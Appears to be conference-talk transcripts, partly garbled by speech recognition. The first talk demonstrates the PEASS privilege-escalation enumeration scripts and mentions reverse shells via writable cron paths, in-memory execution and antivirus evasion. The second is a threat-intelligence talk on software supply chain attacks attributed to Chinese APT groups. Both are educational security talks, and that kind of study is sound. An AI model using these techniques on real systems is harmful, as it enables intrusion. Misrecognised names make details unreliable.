vulnerabilities and improve the security or exploit the vulnerabilities, depending if you are in a routine or in a routine. Also, Hactress is pretty useful, because when you execute these tools, you are going to see probably some links to some parts of the book. And this is because if you don't understand the tech that the script is performing, you can access this URL. And you are going to have the theory about the tech. What, why is being performed, and what use will it take for, and how can you exploit a vulnerability phone in that section, if any. You have it for Linux, for MacOS in the future. I'm just starting. And for Windows. And to give you a very brief example, for example, let's say that you find some vulnerability which is related to access tokens. And you don't know what access tokens in a Windows environment you can just come here and have a description about what is the access token, how to enumerate them, how can they be in abuse, and everything. Basically, this is pretty useful to know why are the P's performing the techs they are doing, and how can you exploit them if you find any vulnerability. Also, you have here the URL. This is free for everyone. You can just access the book and use it as a piece. So let's continue. Now we are going to start with the demos. We are going to perform our Linux with Limpies. And then I demo with MacPies. So here I have a pretty vulnerable and very updated Debian machine that we are going to execute Limpies just to see the vulnerabilities that it is finding. So I have already accessed this machine via SSH. So I'm logged in. I'm on my user user, and I'm in this very outdated Debian machine. I have also already uploaded Limpies. So we are just going to execute it. First of all, take a look at the options because Limpies and WIPPs have several options that may be useful. For example, in Limpies, you can find the dash A. This means to perform all techs. And this is because there are some techs that are very, very slow or that are very noisy, that by default they aren't executed. But if you are playing a CTF or you don't care about being noisy or about the time, I completely recommend you to execute dash A because more techs are going to be executed. So you have the Superfax option. And you also have some options that will allow you to perform network return just using Limpies, which is kind of cool because just with Limpies you will be able to enumerate the machine, but also to enumerate the network if you don't want to upload any other tools. So let's execute Limpies. We are just going to run it without dash A. We are just going to run Limpies in a normal version. So here we can see that Limpies start with a very, very, very beautiful banner. Here we can find version. We can find legend. This means what the legend can, what the color means, which is kind of awesome because here we can see that the red-yellow indicates a 90%, 95% chance of previous installation vector. Red means that we'll just take a look at it. And green basically means well-configured things or common things that you really shouldn't care about because this was found in other machines. We have some basic information, same information about the tools that are available to enumerate the network. And then we start enumerating the system. So here we can find system information. We can see just in red that the kernel is pretty real. The pseudo version is also a little bit old, so probably they are vulnerable. We can see a little more information about the systems. If you're in for environment, you may be able to find some passwords here. We enumerate also some Linux protections, like is a Linux enabled? Is this a virtual machine? Actually, this is. So we have here just some information about the container if this was a container, but we are an inside a container. So nothing interesting here. Devices, available software. It's good to know if you have some compiler available to compile possible kernel exploits. Then we start taking a look to processes that may be vulnerable to scalability, binary process permissions, ground jobs. And here we can find the first highly probable privileged escalation vector that LIMP has found. So for example here, this user is able to write in a path that is being used in a Chrome that is then being executed by root without indicating the path. So for example, if we create a file called override.sh with a river cell in this folder, this is going to be executed by root, and we are going to obtain a river cell executed by root. Here we can see the LIMP is enumerating more information. Also, network is always important to know where you are in a network. And with other networks, new networks, you can access and enumerate them. Here we have just an enumerated local network. And we are even checking if we can sniff traffic using GCP. Then we are enumerating some user information. And here we can see that there are a bunch of ways to escalate privilege by executing different binaries with pseudo. More information about the users, software information. This is pretty interesting. And it's one of the main themes of LIMP and WIMP. And it's one of the main new topics in the new generation scripts. So we are going to talk about them later. But basically here, we are just looking for sensitive files for files that may be containing sensitive information related to some specific software. For example, some Tomcat configuration files that may have passwords inside of it. You can see that we are looking for a bunch of them, actually. We'll talk about this later. So we are going to continue till the last section, which is interesting files. These files, the files that are here are here just because they have some interesting fact that will make LIMPs to enumerate them. For example, here we can find all the QID files. Some of them has been vulnerable in the history so we have here some information about in which systems this QID binaries are vulnerable. And also the QID binaries that are unknown, but LIMPs are going to be executed in order to perform a few checks to see if we can abuse these files to execute arbitrary commands and escalate privilege. Same thing for SGAID files. Again, if you don't know what these files are, you can follow this link and you will find all the information. Taking misconfigurations, well, we are taking more misconfigurations. We can write a few files and folders here that we can abuse to escalate privilege. So this is very cool. We thought about a lot of files. So basically here, you are going to see that, well, LIMPs is looking for a lot of information that may give you sensitive information. Or the power to escalate privilege. Always take a look to everything because you can find something interesting. So this is LIMPs. Now we are going to continue with a Mac piece demo. But there is something important that you need to know. First of all, there is no Mac piece script because Mac piece is actually inside of LIMPs. If you execute LIMPs inside a Mac host, Mac piece is going to be executed. And I have created this script this way because the code that both scripts, both flavors of the script serves is like 90%. So almost every part of the code is served. So I just generate some specific parts for the Mac version in order to run these parts in a Mac computer instead of the regular LIMPs. But as you can see here, just execute LIMPs in a Mac OS system and the Mac piece version will be automatically executed. So this is very cool because you only need to know how one script works in order to execute it in Linux, in Mac OS, and potentially any flavor of Unix. So my current host is a Mac. So I have already executed the LIMPs version in my Mac. Actually, I have executed it from file, but I have executed it from memory. I have just downloaded it from GitHub and piped it into a SHL. So this way the script is never going to touch the disk. Yeah, here we can see that. I have already executed it because as my host has a lot of more files than a virtual machine, this could take instead of taking just one minute, this could take around five minutes to minutes, and it doesn't want to keep you waited. So here we can see that the banner is much more ugly. I really definitely need to improve that, but it's not on my priority list. Again, here we can see some basic information. We can see some system info, and we can mostly see the same information from LIMPs in MacPs. The difference is like underneath, there are different binaries being executed to obtain the same information. But it's pretty cool, because you just need to execute one, it is going to be intelligent enough to distinguish between Mac or Linux, and just the correct version is going to be executed well. As I have said, you are going to find most of the same information as before, so we can pass this output. You can just test it in your own. Okay, okay. So LIMPs, we can start. Also, there are other more stealthy ways to execute LIMPs. A bunch of them are mentioned in the RUIDME, even ways to bypass antiviruses. So check this out, because it's going to be very cool for you to learn how you can execute LIMPs, probably just using NetCAD and CooL, or even without that, using bus pipes. So, yeah, that's all for LIMPs. Okay, so let's continue with LIMPs. So obviously, the Windows version of the script. Okay, so here I have a Windows virtual machine where we are going to execute LIMPs. Obviously, LIMPs is using a completely different script that LIMPs. Actually, there are two different projects for LIMPs. One is the BATS version, and the other one is the XC version. The BATS version is less maintained than the X version, and is mostly created for all Windows machines. So the most maintained version of LIMPs is going to be the X one, and it's the one you recommend you to execute if you can. Obviously, there are some requirements, like the.NET version, but mostly you are going to, in nowadays, Windows, you are going to be able to execute it, so I definitely recommend you to execute this version. So here, also, we have a quick start, and we also have a few ways to execute LIMPs from memory, or execute LIMPs while doing some kind of stealthy things in order to avoid antivirus to detect that we are executing the binary. I recommend you to take a look at it, because it is pretty interesting. LIMPs also have some interesting parameters. For example, LIMPs allows you to execute LIMPs, and this is very cool, because if you find in a Windows, the Windows subsystem for Linux, you can execute LIMPs, because it is a BAS script, so if you just indicate to LIMPs the URL where it can find LIMPs, it is going to download and execute it from memory, I think. Also, you don't even need to host your version of LIMPs, you can just indicate the URL for LIMPs inside GitHub. Oh, well, you have also more health information, basic information. Where are my colors when you execute LIMPs without doing anything in a new Windows host? You are not going to see any color, you need to execute this first in order to indicate the registry that, hey, I want you to interpret the colors that are going to be displayed. Just run this, you don't need to be root or anything, and the colors will magically appear. Well, you need to start another PowerShell cell. Okay, so I have already run LIMPs in this host. We can see that we have another very beautiful banner, we have some information about the creators, and we start with LIMPs, we start seeing some system information. We have integrated Watson inside LIMPs, so this is pretty cool because it will just run with LIMPs. Here we can find that we are numerating the hotfixes, that has been applied to this virtual machine in this case, information about environment variables, information about ODE, web labs, WDigest. Again, if you don't know what, for example, if you don't know what is WDigest, you can just access this URL inside Hottricks, and you will learn what is this and why is this important. Same LSA protection, protection of guards. So the main difference between Windows and LIMPs, apart from the obvious one, is that you are not going to find these red-yellow colors in LIMPs, that you will find them in LIMPs, and this is because maybe in LIMPs it's more complicated to be so sure that something is going to give you a previous escalation path, so I haven't implemented those yet, but I may do that in the future. Well, as you can see in LIMPs, it's numerating a lot of things, interesting events. Now we have some user information. In red, you can find interesting things for attackers. So here you can find the user administrator, home-side folders, something interesting about WIMPs is that it's checking every path that appears. So for example, if this path was reachable by our current user, this will appear on red and will tell you, hey, you can write this binary, maybe you can escalate privilege because this is being executed. As you can see here, obviously you cannot escalate privilege over writing WIMPs because this is a binary of the user we are using, but maybe if this was being runed by another user which is an administrator and you can write the binary, you may be able to escalate privilege. Same for services information. Actually, here you can see an example of what I have been talking about, and it's that this service, this binary of this service is reachable by everyone, so here you have a privilege escalation path. Also WIMPs is checking for no quotes and space in the beam path of the services, so you may be able to abuse this misconfiguration also to escalate privilege. More information about applications, how to run, same. You may find some places that you can write and your binary is going to be executed with higher privilege, so that's pretty awesome. And I want to show you a few more things. Network information, again, is very important to know where you are inside an internal network, if you're inside an internal network, or anyway, with other networks you can access that you weren't able to access before. And also it's important to check the ports. I don't have, well, UDP, the ports that are listening just in localhost because maybe these services are vulnerable and you can, well, escalate privilege, are using those. We found some, well, the NLTLM has of our current user, I think. User, yeah. We found the unattended file, this may have credentials of the administrator user. And this is pretty awesome because you can see here this section, the file analysis section, and we are also looking for a lot of files that may be storing sensitive information. So before the piece new generation, every time I wanted to search for a file that may be containing sensitive information, I needed to ask, add a specific tech to LIMPIS and then a specific tech to LIMPIS. This was pretty awful because, well, it was kind of hard and it took several minutes. With the new generation scripts, we have this build list, inside this build list folder, we have this sensitive file, Jamal, where you can find all the sensitive potential files that can store sensitive information. This is pretty awesome because, for example, FileFigia, Pjamal is specifying to search the folder with the name FileFigia and inside this folder to search the file called SiteManager.xml and if it is found, print in red, all the lines that contain some of those reg access. So this is pretty awesome because LIMPIS and WIMPIS are automatically created using this Jamal, so both of them are going to search all these files and if they found them while executing, they are going to print them to you. This is very awesome because now, in order to just add a new tech, if I want to, if I discover a new file that maybe contains sensitive information, I can just add it to this Jamal and this is going to, and the new LIMPIS and WIMPIS are going to automatically be built and are going to be searching for the new sensitive file. So this is very easy to maintain and also is very easy for the community to help me add new files that maybe store sensitive information. Actually, you have here a few examples well explained, so if you want to just contribute to this script because you know about this file that maybe contains credentials that aren't included yet, just take a look at the example, including in Jamal, create a pull request to master and the new versions are going to be automatically built, so it's just awesome. As I have said before, WIMPIS has another flavor which is the BATS one, which is meant for all machines. Actually, the syntax is a little bit more complicated because BATS is not very flexible. Anyway, if you need to use it at any point, you can find it here and also take a look to this explanation of how to understand the permissions because you will need it in order to find the paths to escalate privilege because here you are not going to find colors or because BATS is not very, very, very flexible. So we are ending this presentation. We are going to continue with BATS. I created this like one or two months ago, I think. This is a very, very simple script. This is basically monitoring new CBS and the ones that are related to privilege escalation are going to be indicated in this group of telegram. In this group, we also discussed about HAT3's piece and latest news in cybersecurity. So it's free for everyone. Feel free to join it. Also, you can find BATPIS in GitHub. You can find it here. Actually, this BAT allowed you to create your own BAT and monitor the CBS you are interested in. So basically, you can modify this Jamal and set your own keywords and then put your slab web hood or your telegram token. The bot will send you all the new CBS that are this color that contains the keywords that you have specified here. In this case, we are just looking for things related to privilege escalation or docker container escape. Okay. So, yeah, feel free to join the group if you please. Finally, about the to-do. So we now have in this new generation, we have the capability of creating JSONs from the raw output and you can find the script to generate these JSONs in the parser folder. So you can basically execute the piece parser, give the path to the output of one piece script and generate the JSON. I'm looking forward to someone that from that JSON can generate a beautiful PDF HTML report. That would be awesome. Also, I want to develop web piece, which is going to be the centralized agent that will allow you to automatically execute lean piece or win piece and compare the results and even add new features. So I'm really looking for someone with experience in front end and or back end. So if you want to help me develop a web piece in order to allow to perform this constant monitorization, just contact me. And finally, obviously, win piece and lean piece are very big scripts but can be bigger. So if you know about new techs or if you want to help updating the list that they are using, just contact me because this is a huge project that needs a few help. The help of anybody that can, any help that you can bring me. So I hope you have enjoyed this talk. Thank you very much. I hope you are enjoying DevCon. And now I will be in the Discord channel if you have any questions. Thank you for your time again.
|
Local privilege escalation techniques are far beyond checking the Windows/Kernel version, looking for unquoted service paths or checking SUID binaries. Moreover, a local privilege escalation could make a huge difference when trying to comprise a domain. Several tools have been created to find possible privilege escalation paths, but most of the tools for Red Team and Pentesting just check for a few possible ways, so pentesters need to use several tools and do some manual recon to check for everything. PEASS is a compilation of a bash script for Linux/MacOS/*nix and a .Net project and a batch script for Windows that I have created some time ago which aims to check and highlight every possible privescpath so professionals don’t need to execute several different tools for this purpose and can very easily find vulnerabilities. During this talk I would like to present PEASS-ng. The architecture of these scripts has evolved and improved so much that I would like to present how they work at the moment and how the difficulty to collaborate with the project has been reduced significantly. Moreover, I would also like to present the 2 new PEAS that haven't been present anywhere yet: BotPEAS and WebPEAS (the latest one will be released the day of the talk). During the talk I will also present my local privilege escalation resources (https://book.hacktricks.xyz/linux-unix/privilege-escalation , https://book.hacktricks.xyz/windows/windows-local-privilege-escalation) so the attended will be able to continue learning about the topic after the talk.
|
10.5446/54360 (DOI)
|
Hello, welcome to my talk. I'm Cheryl Biswas. I also go by encrypted and I really appreciate you taking the time to discover software supply chain attacks and the Chinese APTs who have been increasingly behind them, find, field and delivered. So, whom I work as a thread intel analyst with a major bank here in Toronto, Canada. I am a founding member of the Diana initiative. We just had our this conference that was online. Much thanks and appreciation to everybody who was able to be part of this. We love supporting inclusion, diversity and just drawing a bigger circle about who we bring into this amazing field. I'm a member of the C3X college students cyber simulation here in Toronto and it's an annual event because it's great to be able to give college students the opportunity to learn in a real life environment what it feels like to respond to an incident, how to communicate with management and just to be able to pay it forward because we all started somewhere. Okay, that's enough exciting things about me. I'm a cat mom, but you don't get to see my cats. They are in the other room. All right. In this talk, I want to explain what software supply chain attacks are and the growing threats that they pose. So we're going to take a look at code dependency, how that's a factor and how it's compounded by mistakes and misconfigurations. We're going to take a look at some of the attacks and the state sponsored actors that are involved. And what this will do is highlight the prevalence of Chinese threat actors who continue to up their game and the number of victims. And then we'll wrap up with what we could do better and how we need to shift. Okay. I thought that this would be a great starting point. What a year it's been. Even before we got out of the game, the tone was set. SolarWinds was truly unprecedented. And it's the kind of event that we talk about for decades. We build and we learn off of it. But the thing is software supply chain attacks aren't something new. They've been around for many years. And we've been watching that check engine light for a long time, but not really addressing the issues. So I'm here to tell you there is a lot more going on than we realize. The supply chain attack is an abuse of trust. It's compromised right at the source. This can create access points into the networks of those customers, into the thousands, as was demonstrated by the attack against SolarWinds Orion. And as we learned, nobody is untouchable. Everyone is a potential target. According to MITRE attack, a software supply chain attack happens when hackers manipulate the code in third party software components in order to compromise the downstream applications that use them. Attackers leverage compromised software in order to steal data or to corrupt targeted systems or to gain access to other parts of a victim's network through lateral movement. And any other upstream part of an organization's supply chain can then be targeted. Now that can include application developers or publishers of just off the shelf software like SolarWinds, but also think of API providers. And there are a lot more APIs by the day and just the open source community in general. Quote, the attackers tamper with the development process of the software to inject a malicious component such as a remote access tool that will allow them to establish a foothold into the targeted organization or individual. Pretty powerful, very effective. Now this is a timeline of events going from the end of 2020 into this year. And as you can see, it got busy. You might even recognize some items on there and we'll talk a bit about most of these as we go through. As that attackers will manipulate software dependencies and development tools in order to compromise the data or systems before they reach the recipient. And as we've seen, they go after the source code. Now in the case of SolarWinds, Microsoft said that attackers gained access to some of the source code for Exchange, Azure and Intune. I don't have to tell you, especially not after this March, just how many Exchange boxes are in use out there or how many, many organizations have Azure up and running or in the process of getting them up and running with the mass migration to cloud environments. Having the source code lets the attacker look for undiscovered vulnerabilities in order to exploit them first. And they like to go after certificates. And that's another thing, software certificates. They're involved in so many of these attacks, pretty much all of them. Stolen code signing certificates allow the attackers to evade detection and to deliver malware payloads. As though it comes from a legitimate source because of course with a certificate, why wouldn't it? Signed, sealed, delivered. This is what Chinese APT Barium did with the Azure Live Update when they infected Azure users en masse. And certificate abuse is an ongoing component in all kinds of attacks. For example, two years ago in an NPM attack, developer accounts were targeted and build environments were compromised. So let's talk about the who and the why. This is definitely the purview of state-sponsored threat actors who have been in many cases identified as a group of Chinese cyber espionage groups known as APT 10, APT 17, and APT 41, the various other nicknames, as well as some major Russian threat actors. Now China has actively targeted tech companies in Taiwan with supply chain attacks because they see them as major competition. And this is what where I do, spread intelligence plays a key role because we're watching the geopolitics play out and we're reaching back for historical context on patterns of behavior because history repeats itself and actions have consequences. Ian Pratt, who is the global head of security for personal systems at HP, had this to say, whether they are a direct target or a stepping stone to gain access to bigger targets, as we've seen with the upstream supply chain attack against solar winds, organizations of all sizes need to be cognizant of this risk. Now both cyber criminal and state-sponsored groups target the technology industry because these companies are relied on by many organizations and individuals and that can have a wide-ranging impact. Attacks on tech companies can enable third-party compromise of enterprise customers via software supply chain attacks. And that's the beauty of a supply chain attack. You don't have to go directly after your target. You come at them sideways. Nick Weaver, the security researcher at UC Berkeley International Computer Science Institutes, shares this. Supply chain attacks are scary because they're really hard to deal with and because they make it clear that you are trusting a whole ecology. You are trusting every vendor whose code is on your machine and you are trusting every vendor's vendor. But grappling with the growing sense of complexity in tech and it's not just what corporations deploy in their own environments but how they're incorporating third-party tech as Windows Snyder says, the product assumes all the security risks of all the components that it incorporates. Need I say more? As I mentioned earlier, we are increasingly code dependent. Sorry, bad pun. The fact is that applications increasingly depend on external software to work. There's proprietary code, open source components, third-party APIs. Modern apps are simply too big for just one developer to try and do on their own. So software reuse has become the norm. There's popular open source projects which are used as dependencies. These become attractive targets for an attacker who can then add malicious code to them and claim the users of those dependencies. Per GitHub security researcher, Maya Kowliorowski, 85 to 97% of enterprise software code bases come from open source components. Yeah, that is a big number. What's the average project having 203 dependencies? That's a lot of trust involved. Now, given how sophisticated these attacks can get, any project that doesn't incorporate basic protections like code signing puts itself at considerable risk. Again, we're using other people's technology. This is about trust issues. So this is a timeline of software package repositories that have been involved in supply chain attacks. It's really easy to just get code from various projects online and then incorporate that into other software. But here's the risk. Some of those open source projects are widely used, but they're not well maintained. Some have even been abandoned. Code reuse can help to simplify and speed up application development, but it's at the cost of being vulnerable to compromised off-the-shelf components. Now, for an attacker, compromising a software supply chain can be through the manipulation of the application source code or the manipulation of the update and distribution methods or by replacing compiled releases with modified versions. And targets can range from either a really specific and limited group to a very wide range. And that brings us here. The continuous integration and continuous delivery pipeline, CI CD, it's considered a best practice for DevOps because it helps them to deliver code changes frequently and reliably. It's a good thing. Now, CI is a coding philosophy. It's a set of practices to help drive development teams to implement small changes and then check in code to version control repositories frequently. Again, this is a great practice. It's a consistent, automated way to build, package, and test applications. With one caveat, we're using other people's technology. Mistakes will be made. Yes. In the Caffe's blog from last July, Sikar Sarokhai, and I hope I didn't mangle that, had this to talk about with regard to a source code leak and what we should have learned from that and how we need to protect our IPs. There was a SonarCube misconfiguration, and it led to a massive leak of source code, which affected 50 major companies. SonarCube is an open source tool that's used for static code analysis and to check for bugs before deployment. Now, based on the attacks, developers and insecure development pipelines are ideal targets, either for state backed APTs or highly resourced criminal groups. And let's discover what those adversarial inclinations look like. This is from a report called Broken Trust, and it was released by the Atlantic Council earlier this year following SolarWinds. There was a lot to be processed. There have been 36 other cases of intruders successfully targeting software updates from 138 recorded supply chain attacks and vulnerability disclosures. At these 36, 15 had similar access to build or update the infrastructure. Think about that. That is a lot of control when you can tamper with and modify existing infrastructure. And half of those 15 could be attributed to nation states. So, this is December the 14th, 2020, the news hit. Now, SolarWinds Orion is trusted network management and monitoring software. It's used by governments, Fortune 500s, security companies like FireEye, major tech companies like Microsoft, and nobody knew anything was wrong. The distinctive here is the degree of stealth, the ability of the adversary to conceal their actions, and the length of time it took for this to be discovered. This was an operation that took time and precision to do the necessary reconnaissance, the sophistication to tailor all the pieces, and then the patience to just let it play out and avoid detection. They targeted and compromised the software build environment and code signing infrastructure for Orion. Code, there's that word, code signing. They modified the source code to add a backdoor, and they signed it. And they leveraged the existing software release management system. And they used stolen certificates to laterally move through chains of trust, signed, sealed, delivered. This attack is significant. I'll tell you a bit about it because it's something we all need to learn from. And remember that things continue to evolve and this just presents opportunity to the attacker. Security researcher Alex Berson shone a bright light on a scary possibility. He took a hypothesis about a supply chain substitution attack, where a software installer script is tricked into pulling malicious code files from a public repository instead of getting the intended files with the same name from an internal repository. And then he targeted Apple, Microsoft, Tesla, and about 32 other companies to execute unauthorized code inside their networks to prove that this would work. However, somebody's watching, somebody's always watching. And in this case, that somebody thought that it would be a good idea to end without, let's say, that permission. They targeted some other companies in March of this year. Again, Microsoft, but also Amazon, Slack, Lyft, and Zillow to name a few. This premise prompted a study by researchers at the Red Hunt Labs. What did they find? Well, 93 repositories out of the top thousand GitHub organizations are using a package that doesn't exist on a public package index. This can be claimed by an attacker to cause a supply chain attack. And 169 repositories were found to be installing dependencies from a host that isn't reachable over the Internet. 126 repositories were installing packages owned by a GitHub or GitLab user that doesn't exist. Now, of the top thousand organizations that were scanned, 212 had at least one dependency confusion related misconfiguration in their code base. This is significant because, according to the researchers, much of the open source ecosystem depends on these giants. We know that these repositories have a lot of users. So it stands to reason that if any of their projects were to get affected, there is significant likelihood that millions of users could be at risk. Xcode Spy. So we know that attackers are targeting developers and they're targeting the shared sites, the repositories where code is uploaded for use by others. In March this year, a new malware variant was observed targeting iOS developers in a supply chain attack to install a backdoor on the developers computer. So Xcode Spy is a malicious project and it affects the free application development environment. It's common behavior by developers to share their projects online with other users. It's just good sense. It's collaborative and it's efficient. Well, threat actors behind this attack abuse this norm and they used a legitimate development environment created by Apple No Less to fool victims into adding an online project to their applications that would compromise their system in a supply chain attack. CodeCov is an online platform used for hosting code testing reports and statistics. Now it provides developers with tools to help them quantify just how much source code gets executed during testing. And they serve over 29,000 customers globally. Many of these are enterprise level clients like GoDaddy, Atlassian, Royal Bank of Canada, Procter and Gamble. But the impact went beyond this to thousands of public development projects like Kubernetes, PyTest, Ansible, Victims included Twilio and Rapid7 and the e-commerce platform, Macquarie. On April 1st of this year, CodeCov reported a supply chain attack that had occurred back in late January. What happened was this. Attackers leveraged an error in the process that creates CodeCov's Docker image. Now this allowed for them to extract credentials which protect the modification of the bash uploader script. This is a tool used by customers to send code coverage reports to the platform. The script was modified to deliver details from customer environments to a server outside of CodeCov. Attackers could export credentials, tokens or keys which pass through CodeCov's continuous integration environment, which we've talked about. They could then use these to access services, data stores or application code. In 2009, Operation Aurora served as a wake-up call when the Chinese state-sponsored group, APT-17s, targeted Google, Adobe and some other tech firms for their source code management systems in order to alter that source code. We're going to talk a bit more about that later. In 2017, there was not Petsha. The elite Russian hacking team Sandworm, who's part of the GRU military intelligence service, compromised and took over the software updates of Medoc, which is accounting software used throughout the Ukraine. And they used this to distribute destructive malware known as not Petsha. This infected major companies like Maresk as unintended consequences and the costs amounted to approximately $10 billion globally. In January of 2019, there was a sophisticated supply chain attack that targeted the ASUS Live Update utility, and that's something that's pre-installed on pretty much all ASUS computers and an auto update feature. And we'll cover that a little bit later as well. This group also delivered something known as ShadowPad malware to infect enterprise networks using a product known as NetSurang. NetSurang specializes in server management and security connectivity software. If this sounds familiar, it should. I think that just happened to silver ones. As promised, let's take a look at the Chinese APT groups who've been involved in software supply chain attacks. Now, all state sponsored adversaries. Chinese cyber espionage groups have been and will continue to be the biggest threat to tech conducting economic espionage and intellectual property theft. Technology companies are rich targets just on their own, but these groups leverage them to infect supply chains to go after their customers. And they are the leaders of the pack in terms of the number of attacks and their capabilities. These are some of the most well-known attacks of Chinese state sponsored threat actors. So I'll go through them briefly and highlight where attribution was able to be made some key lessons about the targeting intrusion and just the issue of trust. Something that really came across to me while I was doing the research on this was the overlap in terms of tactics and tools. My personal observation would be that these groups tend to work closely together. And they probably were learning within one group, then moving on to another, and then they took what they had developed and learned to leverage it as needed because that's efficient. And it's collaborative. And isn't that what we do when we're talking about open source development? Exactly. Why reinvent the wheel when you already have something perfectly useful when somebody's already covered background? These groups are united though in how they're serving their state and its mandate. Now, if you wanted to try mapping Chinese APTs to government and military, I found this work that was already in progress. It's by Anastosios Pingios and I'll share the link on the next slide. It's very complex, but this is a great visual representation. Now, let me give you a moment to take a look at that so you can capture it. And if you're at all familiar with CrowdStrike, they like to group their adversaries in fun and colorful ways. All right, so let's start with 2009 in Operation Aurora. Like I said earlier, it really was a wake-up call. APT-17 had targeted Google, Adobe, and other tech companies to go after their source code by tampering with their source code management systems. This led to Google implementing ZeroTrust to track lateral movement and to implement better infrastructure. Those were their lessons learned. And what's interesting about this is that in the fallout of SolarWinds Orion, Google wasn't one of the companies mentioned. In 2017, an attack was discovered that targeted an administrative software package known as Evlog. This was made by Altair Technologies, who are a Canadian software company. This was a software supply chain intrusion, which targeted enterprise organizations globally, including military organizations and defense contractors, which is something China cares deeply about developing and surpassing the Westat. There were also banks and universities, and there were several major telecom providers. I get a little worried by targeted attacks against telcos for a few reasons, and that's not just because Akamai had a hiccup and went down, but we all feel the pain when we lose our online access for any degree of time. It's pretty much because we can't live without it. Now, in this attack, there was a very impressive client list. And you should be thinking about SolarWinds because that too was a very impressive client list. Several years later, we still don't know how many of these customers were and could still be compromised. Now, why Evlog? Because the users were mostly system and domain admins, and that offered excellent access to targeted networks after the initial compromise. Conosense is really important. I think so many people may have already heard about this one, but Ccleaner. This has been linked to ABT-17 and more specifically to a subgroup known as Axiom, who have historically been engaged in supply chain attacks. The Ccleaner attack showcases technical knowledge, preparation, and patience. The timing was strategically advantageous because the original owner, Pyriform, was in the process of selling to a vast. That creates a lot of distraction and confusion, so it's really easy to miss things like things in the network that don't belong there. The attackers took their time to move laterally in the network during off hours to avoid detection. Within a month, they installed a modified version of ShadowPad Backdoor Malware to escalate their privileges. Then they distributed a cryptographically signed version of a modified Ccleaner product. And no one suspected. Sign, sealed, delivered. If we want to look at this a little more technically and just walk through the actual steps of the attacks, initial compromise came through unattended workstations from a Ccleaner developer. They were connected to the Pyriform network and the attackers utilized TeamViewer. They also reused credentials that they found from previous data breaches in order to access that TeamViewer account. They delivered the malware using VBScript and they developed a malicious version of Ccleaner. They used RDP to open the backdoor on a second unattended but connected computer. There are some good lessons in here if you're taking notes. There they dropped the binary and malicious payload of second stage malware and that was delivered to 40 Ccleaner users. Now they compiled a customized version of the ShadowPad Backdoor in order to allow for further malicious downloads and data theft in preparation for a third stage. And then they installed their third stage payload. Now that malicious version had multi-stage malware in order to steal the data and send it back to the CNC. As far as action on objectives, very likely that stolen data has been put to great use in further espionage activities. If you wanted to try and go through this against MITRE's framework, there's a lot I think that would be applicable. For example, under Recon, you've got a lot of work that they did but supply chain compromise. Resource development, they compromised accounts. I believe they compromised the infrastructure. They certainly developed capabilities and they established accounts. For their initial access, thanks to those reused credentials, they found themselves a valid account to get in with. For execution, they leveraged some software deployment tools and for persistence, well, there was more account discovery and account manipulation to keep them in. For privilege escalation, exploitation for privilege escalation. For credential access, they had credentials I believe from password stores. Discovery, can I say they discovered everything that they was to discover? Lateral movement, as we talked about, they used shadow pad and remote services. Then exfiltration over C2 channel and the impact being some data manipulation and exfiltration. Shadow hammer. This is the ASUS attack. In January 2019, a sophisticated supply chain attack was discovered targeting the ASUS live update utility. This is something that's pre-installed on most ASUS computers. It's to make life easier for the end user. It automatically updates components like the BIOS, UEFI, drivers and applications. In 2017, ASUS was the world's fifth largest PC vendor, which would make it an extremely attractive target for APT groups that might want to take advantage of their user base. In this case, that APT was Chinese threat group, APT17 or Barium, who were, as we've seen, behind the attack on Ccleaner. The attackers altered an older version of the ASUS live update utility software and then they distributed their modified version to the ASUS computers around the world. The software looked legitimate. It was signed with legitimate ASUS tech certificates and it was stored on official servers and it was even the same file size signed, sealed, delivered. And once it was planted, that backdoor program gave attackers control of the target computers through remote servers that let them install additional malware. In 2020, there was an attack known as Able Desktop by the APT group Lucky Mouse. It involved tool reuse by other actors that were not only Chinese groups. And I thought that this was interesting because the shared use of tools and collaboration within Chinese state sponsored groups affects our ability to do accurate attribution. They compromised the Able Desktop chat software that's used by Mongolian government agencies. And then they hijacked updates of the software supply chain. This is a really great small picture of what could be a much larger, more devastating attack. And again, the attackers didn't need to steal or forge an update signature because Able's updates were not signed. Another attack coming out of 2020 was SignSite. This is the Vietnamese government certificate authority and it was the target of a software supply chain intrusion which targeted a wide range of public and private entities. The attacker has used its digital signature software that provides certificates of validation and software suites to handle digital document signatures. Now, this software is widely used throughout Vietnam and it's mandated in some cases. And if you've seen, if you think of Nau Petra and how that tax software was mandatory and there are other cases, this is what attackers, if we're looking through their lens, are leveraging against us. This is truly an abuse of trust. So the key point, the abuse of trust here, leveraging a service oligopoly. We haven't got actual confirmation of who was behind it, but it's definitely believed to be a Chinese state sponsored group, possibly a group known as TA428, who have a track record of targeting East Asian countries like Mongolia, Vietnam, and have possibly even gone into Russia for intel gathering. And that brings us to Golden Spy. Golden Spy malware was embedded in required tax payment software issued to corporations who wanted to conduct business operations in China. Now, Chinese banks require businesses to install an intelligent tax to pay the local taxes, this intelligent tax software, and it's produced by the Golden Tax Department of the Isino Corporation. So the malware installed a backdoor on systems, which enable a remote threat after to execute Windows commands or upload and execute any binary that could be ransomware, remote access, Trojans, anything. And the malware provided system level privileges. So the capability to execute any command or any software on that system where it's installed. And it was connected to a CNC that was distinct and separate from the tax software network infrastructure. You've probably heard of these guys. This year, there was a very, very, very large breach. And it's just coming to light the details around it. CEDA is a global IT provider for 90% of the world's airline industry. The pieces of this, when you put them together, link back to show that Chinese state sponsored threat after APT 41 was involved. And it's potentially impacted over four and a half million passengers. CEDA had announced the attack back in March. And then soon after Singapore and Malaysia Airlines disclosed that their customers personal data had been exposed. After that, Air India reported a major attack against its systems. Now, Group IB took a closer look at this. They didn't believe what they saw at first and then they realized just the level of sophistication involved in what was an enormous level of attack that could only be attributed to a state sponsored actor. And that's how with some digging, they were able to find artifacts through the malware, through overlap in terms of the code that they were seeing to trace it back to APT 41. APT 41, also known as the conspider, when he was ties to Barium. A group that's been active since 2007 and has a track record in supply chain attacks. And that's why it's so hard. My attribution is so hard. All right. So let's talk about what we should and could learn from these attacks. We do have a new executive order, and that's a great step in the right direction. But the picture is far bigger than we realize. These are some recommendations. We need to have prompt communication when something happens. We need to be able to share information effectively. And we have to take action because time is a luxury we don't have and something that our adversaries have plenty of. Code signing is essential, even though, as we've seen, certificate abuse can be rampant. We need to find ways to ensure that tech is secured by default. And we need to establish an international norm with clear penalties because you can't have something without the other. If you're going to have policies, you need to have enforcements. Eric Sheehan of Symantec, who was also integral in helping investigate and decode Stuxnick, says that this is like finding a needle in a haystack to have the right security, telemetry, and visibility at the right control points in your organization. And here's the shift. And so I'd like to end with this. I love podcasts and one of my go-tos is Risky Business. They had an excellent segment about Operation Aurora with Mark Rogers from Aukta, 